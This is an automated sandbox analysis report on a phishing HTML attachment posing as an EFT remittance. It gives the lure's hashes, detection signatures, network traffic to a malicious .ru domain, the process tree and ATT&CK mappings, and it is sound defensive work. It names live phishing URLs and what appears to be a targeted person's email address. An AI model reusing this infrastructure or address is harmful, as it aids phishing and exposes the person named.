Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EFT Remittance_(Dmorris)CQDM.html

Overview

General Information

Sample name:EFT Remittance_(Dmorris)CQDM.html
Analysis ID:1578442
MD5:c38303fde1bb4165b3bc15ac737876b5
SHA1:076d4bcbf25e3579df8baf60f9ef77c468164e70
SHA256:5da83915376f2f84a481b8460c42fb5af17c8dd16eee7c70a1998b631c68666a
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
HTML IFrame injector detected
HTML Script injector detected
HTML document with suspicious name
HTML document with suspicious title
IP address seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 4396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT Remittance_(Dmorris)CQDM.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2008,i,15302390946126171392,15399631728845326187,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vae.venmink.ru/jK5I/#Mdmorris@pierceatwood... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. While some of the code appears to be obfuscated, the overall behavior is highly suspicious and indicates a significant risk of malicious intent.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/EFT%20Remittance_(... This script demonstrates several high-risk behaviors, including dynamic code execution using the `Function` constructor, data exfiltration by sending sensitive information to external servers, and the use of obfuscated code. These behaviors are indicative of a highly suspicious and potentially malicious script, warranting a high-risk score.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vae.venmink.ru/jK5I/#Mdmorris@pierceatwood... This script exhibits several high-risk behaviors, including detecting browser automation tools, disabling common keyboard shortcuts, and using a debugger-based technique to redirect the user to a suspicious domain. The combination of these behaviors suggests malicious intent, likely to prevent analysis or user interaction.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vae.venmink.ru/jK5I/#Mdmorris@pierceatwood... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the interaction with an unknown domain 'TaXtT0HxZZ4YsfcFA9TFi3VIrQGZ38qFyK1vtPTcUtYAltZauOwKQl1VjCAu.aeeouirl.ru' further increase the risk. While the script appears to have some legitimate functionality, such as handling a form submission, the overall behavior is highly suspicious and indicative of potential malicious intent.
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comHTTP Parser: New IFrame, src: https://vAE.venmink.ru/jK5I/#Mdmorris@pierceatwood.com
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comHTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comTab title: EFT Remittance_(Dmorris)CQDM.html
Source: EFT Remittance_(Dmorris)CQDM.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comHTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /jK5I/ HTTP/1.1Host: vae.venmink.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vae.venmink.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vae.venmink.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vae.venmink.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vae.venmink.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vae.venmink.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48e58af95843fa&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: vae.venmink.ru
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: EFT Remittance_(Dmorris)CQDM.htmlString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443

System Summary

barindex
Source: Name includes: EFT Remittance_(Dmorris)CQDM.htmlInitial sample: remit
Source: classification engineClassification label: mal68.phis.evad.winHTML@27/23@16/9
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT Remittance_(Dmorris)CQDM.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2008,i,15302390946126171392,15399631728845326187,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2008,i,15302390946126171392,15399631728845326187,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Data Obfuscation

barindex
Source: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comHTTP Parser: file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
vae.venmink.ru
104.21.85.123
truetrue
    unknown
    code.jquery.com
    151.101.66.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        challenges.cloudflare.com
        104.18.94.41
        truefalse
          high
          www.google.com
          172.217.19.228
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
              high
              https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                high
                https://code.jquery.com/jquery-3.6.0.min.jsfalse
                  high
                  file:///C:/Users/user/Desktop/EFT%20Remittance_(Dmorris)CQDM.html#Mdmorris@pierceatwood.comtrue
                    unknown
                    https://vae.venmink.ru/jK5I/true
                      unknown
                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48e58af95843fa&lang=autofalse
                          high
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/false
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            172.217.19.228
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            104.17.24.14
                            cdnjs.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.18.94.41
                            challenges.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.18.95.41
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            104.21.85.123
                            vae.venmink.ruUnited States
                            13335CLOUDFLARENETUStrue
                            151.101.66.137
                            code.jquery.comUnited States
                            54113FASTLYUSfalse
                            104.17.25.14
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            IP
                            192.168.2.5
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1578442
                            Start date and time:2024-12-19 17:50:06 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 22s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowshtmlcookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:EFT Remittance_(Dmorris)CQDM.html
                            Detection:MAL
                            Classification:mal68.phis.evad.winHTML@27/23@16/9
                            Cookbook Comments:
                            • Found application associated with file extension: .html
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 172.217.19.10, 64.233.164.84, 172.217.17.46, 172.217.19.234, 172.217.19.170, 142.250.181.74, 142.250.181.106, 142.250.181.138, 172.217.17.42, 142.250.181.10, 172.217.19.202, 172.217.21.42, 216.58.208.234, 172.217.17.74, 199.232.214.172, 192.229.221.95, 172.217.17.35, 172.217.19.206, 23.218.208.109, 20.12.23.50, 13.107.246.63
                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: EFT Remittance_(Dmorris)CQDM.html
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                            • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                            http://vtaurl.comGet hashmaliciousUnknownBrowse
                            • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                            http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                            • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                            104.18.94.41https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                              Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
